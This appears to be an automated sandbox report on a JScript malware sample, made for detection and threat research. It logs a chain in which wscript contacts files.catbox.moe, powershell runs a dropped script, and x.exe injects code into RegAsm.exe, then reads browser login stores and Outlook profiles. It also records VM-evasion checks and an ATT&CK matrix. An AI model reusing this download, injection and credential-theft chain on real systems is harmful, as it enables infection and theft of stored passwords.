                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98140s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97922s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97812s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97703s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97593s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97484s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97122s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -97015s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96797s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96140s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96030s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95921s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95812s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95703s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95593s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95484s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95265s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95156s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -94937s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -94828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -94696s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -94593s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97122Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96030Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 94937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 94828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 94696Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 94593Jump to behavior
                Source: powershell.exe, 00000001.00000002.1829673756.000001DCBF714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000001.00000002.1829673756.000001DCBF714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                Source: RegAsm.exe, 00000005.00000002.2955331627.0000000000F31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                Source: powershell.exe, 00000001.00000002.1829673756.000001DCBF714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                Source: wscript.exe, 00000000.00000003.1834258490.000001E210E2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1839683434.000001E213407000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E213407000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1838665257.000001E210E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000002.1839863288.000001E213474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AAC168 LdrInitializeThunk,LdrInitializeThunk,5_2_02AAC168
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41C000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AB8008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information21
                Scripting
                Valid Accounts1
                Exploitation for Client Execution
                21
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell
                1
                DLL Side-Loading
                411
                Process Injection
                3
                Obfuscated Files or Information
                LSASS Memory13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
                Software Packing
                Security Account Manager1
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Timestomp
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets31
                Virtualization/Sandbox Evasion
                SSHKeylogging23
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586897 Sample: 1C24TDP_000000029.jse Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 33 reallyfreegeoip.org 2->33 35 mail24430.maychuemail.com 2->35 37 4 other IPs or domains 2->37 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 63 10 other signatures 2->63 9 wscript.exe 1 16 2->9         started        signatures3 61 Tries to detect the country of the analysis system (by using the IP) 33->61 process4 dnsIp5 45 files.catbox.moe 108.181.20.35, 443, 49730 ASN852CA Canada 9->45 29 C:\Temp\dddddd.ps1, ASCII 9->29 dropped 69 System process connects to network (likely due to code injection or exploit) 9->69 71 Wscript starts Powershell (via cmd or directly) 9->71 73 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->73 75 Suspicious execution chain found 9->75 14 powershell.exe 13 9->14         started        file6 signatures7 process8 file9 31 C:\Users\user\AppData\Local\Temp\x.exe, PE32 14->31 dropped 77 Suspicious execution chain found 14->77 79 Found suspicious powershell code related to unpacking or dynamic code loading 14->79 81 Powershell drops PE file 14->81 18 x.exe 3 14->18         started        21 conhost.exe 14->21         started        signatures10 process11 signatures12 47 Antivirus detection for dropped 